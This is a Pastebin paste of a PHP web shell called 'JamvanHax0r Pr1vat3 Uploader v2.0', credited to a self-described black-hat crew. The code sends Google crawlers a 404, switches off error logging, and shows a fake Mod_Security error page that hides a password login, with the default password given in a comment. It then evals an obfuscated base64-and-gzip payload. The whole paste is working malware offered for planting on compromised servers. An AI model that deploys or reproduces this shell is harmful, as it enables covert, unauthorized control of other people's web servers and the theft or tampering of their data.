Advertisement
Newbie4rt-ID

JamvanHax0r Pr1vat3 Uploader v2.0

Jan 28th, 2015
364
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.56 KB | None | 0 0
  1. ###     Tampilan    :   Luar    : http://i.imgur.com/pXrydJr.png   Dalam    : http://i.imgur.com/1Y2jXFp.png
  2. ###     Created     :   JamvanHax0r ~ 28 January 2015
  3. ### Add/Follow  :   https://facebook.com/JamvanJr.Co.Id
  4. ### Like        :   https://facebook.com/BlackHat.Cyber.Crew
  5.                                 ++++++++++++++++++++++++++++++++++++++++++++++++++++
  6.  
  7. <?php
  8.   /*
  9.   /// C0d3d by JamvanHax0r
  10.   /// BlackHat Cyber Crew
  11.   /// https://facebook.com/JamvanJr.Co.Id ~ https://facebook.com/BlackHat.Cyber.Crew
  12.   */
  13. $auth_pass = "21b3045c6dd5126dc4a0929b5094538e"; // Default Pass: r00t@bccTeam
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. @define('SELF_PATH', __FILE__);
  17. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  18.     header('HTTP/1.0 404 Not Found');
  19.     exit;
  20. }
  21. @session_start();
  22. @error_reporting(0);
  23. @ini_set('error_log',NULL);
  24. @ini_set('log_errors',0);
  25. @ini_set('max_execution_time',0);
  26. @set_time_limit(0);
  27. @set_magic_quotes_runtime(0);
  28. @define('VERSION', '2.1');
  29. if( get_magic_quotes_gpc() ) {
  30.     function stripslashes_array($array) {
  31.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  32.     }
  33.     $_POST = stripslashes_array($_POST);
  34. }
  35. function printLogin() {
  36.     ?>
  37. <title>Not Acceptable!</title>
  38. <h1>Not Acceptable!</h1>
  39. <p>An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.</p>
  40.  
  41.     <style>
  42.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  43.     </style>
  44.     <center>
  45.     <form method=post>
  46.     <input type=password name=pass>
  47.     </form></center>
  48.     <?php
  49.     exit;
  50. }
  51. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  52.     if( empty( $auth_pass ) ||
  53.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  54.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  55.     else
  56.         printLogin();
  57.  
  58. eval(gzuncompress(base64_decode("eJyVU11r2zAUfQ/kP1y0ghPY4oR2L62t7GWlLYMV0j2MEIIsy7E2fSFfZ03H/vvkyA4NY4yBba50z7nn3GtpSccjgKxGrUKU1YKVFMajEKJEJegD03tm7tjz3MOjX+wZXsIXpywrhc/SiAngwpYHKHbcKutzUijGv5Nj5VCbC4PCDyupd9B4npMa0V2n6Q/mvh01Zm0zQ5s+3M2c2Z3I6YmdpZ3IMYguIUI6lAOm5M7kJKIH9pCurEE49wbn5iBbutqNR4LXFpIzwpvFoppXl4SGXa+BcZQ2KBHQAmtb5sTZBgkIw/HgRE50q1A65jHt8O9KhoyAYTqk2n5wBGT5akWztBOkyc0/DEjjWoQoU0klhroxbuRLiN/PT8CY3AYd0pOattASo3zc3zPVhkT8pdGJ168NyWoCF9vHz6unddJRkg3kOQwEmMLPOMmA+8CtO0wutrf3nz6u1knnKtmsE9Ru21lJNm/hj2RMTEMZ6FsvaOy+YjwYu+dCMROE+mH0s+ibvXLPhK5azkXTwOTrtPcdjgrNCn98kxv4FR0K1Yj/lKGxTbhlwW4J1+6vAuFZdtt++NTxzPbnK6y7G/YbihALSA==")));?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement